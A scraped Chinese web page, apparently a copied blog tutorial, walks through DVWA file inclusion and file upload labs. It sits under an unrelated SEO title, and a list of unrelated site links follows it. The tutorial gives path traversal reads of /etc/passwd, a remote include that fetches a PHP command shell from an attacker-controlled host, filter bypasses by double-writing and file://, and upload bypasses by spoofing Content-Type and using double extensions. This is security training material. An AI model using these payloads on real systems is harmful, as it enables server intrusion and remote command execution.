当前位置: 首页 > news >正文

兰州网站运营诊断wordpress怎么压缩

news 2026/1/29 23:35:50
兰州网站运营诊断,wordpress怎么压缩,怎么查看网站收录,襄阳seo优化服务文件包含 本地文件包含#xff08;敏感信息泄露#xff09;和远程文件包含#xff08;命令执行#xff09; 本地文件包含一般包含一些本地的敏感文件#xff0c;如#xff1a;/etc/passwd或/etc/shadow等 远程文件包含能使得服务器代码执行#xff0c;如包含黑客vps的…文件包含 本地文件包含敏感信息泄露和远程文件包含命令执行 本地文件包含一般包含一些本地的敏感文件如/etc/passwd或/etc/shadow等 远程文件包含能使得服务器代码执行如包含黑客vps的http://192.168.72.162:8000/shell.php文件而文件内容如下?php system(whoami)? 测试环境 本地文件包含不用什么测试环境只要有个文件就能知道其是否触发远程文件包含需要我们写个php代码如下 ?php echo this is the remote file.\n; system($_GET[a]); ? 然后python -m http.server 开个服务器让dvwa能包含我们的php代码 easy linux服务下的本地文件包含 ../../../../../../etc/passwd windows服务下的本地文件包含 我的php网站部署在F盘在F盘下放一个test.txt ​ ../../../../../../test.txt能将文件读出 或者直接绝对路径 ​ C:/Windows/system.ini 远程文件包含 http://www.oswe.com/dvwa/vulnerabilities/fi/?pagehttp://192.168.72.162:8000/shell.phpawhoami ​ 访问成功如下图 medium $file str_replace( array( http://, https:// ), , $file ); $file str_replace( array( ../, ..\\ ), , $file ); ​ 方法1 直接输入绝对路径 http://www.oswe.com/dvwa/vulnerabilities/fi/?pageF:/test.txt 正常输出 ​ 方法2双写绕过 http://www.oswe.com/dvwa/vulnerabilities/fi/?page ..././..././..././..././..././..././..././..././test.txt ​ http://www.oswe.com/dvwa/vulnerabilities/fi/?pagehthttp://tp://192.168.72.162:8000/shell.phpawhoami high if( !fnmatch( file*, $file ) $file ! include.php ) {// This isnt the page we want!echo ERROR: File not found!;exit; } ​ 上面的逻辑是如果参数没有file字符串且不是include.php直接过滤所以这个情况不能使用远程文件包含了 我们通过伪协议file bypass ​ pagefile:///C:/Windows/system.ini或 pagefile:///../../../../../../../../test.txt impossible if( $file ! include.php $file ! file1.php $file ! file2.php $file ! file3.php ) {// This isnt the page we want!echo ERROR: File not found!;exit; } ​ 后台只允许包含这4个文件 文件上传 文件上传只有medium、high、impossible三种难度 准备个php脚本 ?php system($_GET[a]); ? medium 检测请求头 ​ 抓包修改数据包直接过 Content-Type: image/jpeg high 检测后缀是否为jpg、jpeg、png ​ 上传 shell.php.jpg或shell.php.png都能被解析为php文件总感觉哪里很怪 impossible imagecreatefrompng imagecreatefromjpeg 由文件或url创建一个新图像如果解析图像失败会报错 ​ 上传的文件会成为md5值.png或md5值.jpg的形式web服务器不会将其解析为php文件
http://www.dnsts.com.cn/news/271365.html

相关文章:

  • 张北县网站建设附近最好的装修公司
  • 求手机网站河北港网站建设
  • 网站开发公司选择网站是由多个网页组成的吗
  • 建设网站要多少页面响应式网站对seo
  • 网站新闻后台怎么做wordpress自动增加阅读量
  • 做美食推广的网站搜狗引擎搜索
  • 济源网站建设的公司图案logo设计
  • 佛山网站推广优化公司怎么做网站的seo排名知乎
  • 如何制作网站效果图做网站一定要域名嘛
  • 旅游网站建设风险网站开发的目的 实习报告
  • 做兼职女的网站北京本地网络推广平台
  • 南宁工程建设网站有哪些搜狗收录批量查询
  • 建设班级网站首页微信公众号怎么开店
  • 网站做抽奖活动网站后台登陆地址
  • 有做材料的网站吗上线了建站教程
  • 国外做的不错的网站石家庄网站建设开发
  • 做网站用什么需要好音乐网站制作教程步骤
  • 外贸电商平台哪个网站最好天猫入驻官网入口
  • 建网站支持设备是什么意思微网站怎么做微名片
  • 什么公司做企业网站深圳seo优化排名公司
  • 东莞企业建站程序学生个人网页制作html动态
  • 网站开发实战答案网站ps照片怎么做
  • 怎么制作网站卖东西动易的网站能否静态
  • 松江网站建设wordpress中文团队
  • 对公司网站建设的建议广州正规网站建设哪家好
  • 商河做网站多少钱贵州省住房和城乡建设部网站
  • 经营购物网站html网站模板资源
  • 网站301多久郑州网站建设技术
  • 钓鱼网站链接怎么做重庆企业网站推广平台
  • 网站建设培训 店asp的网站空间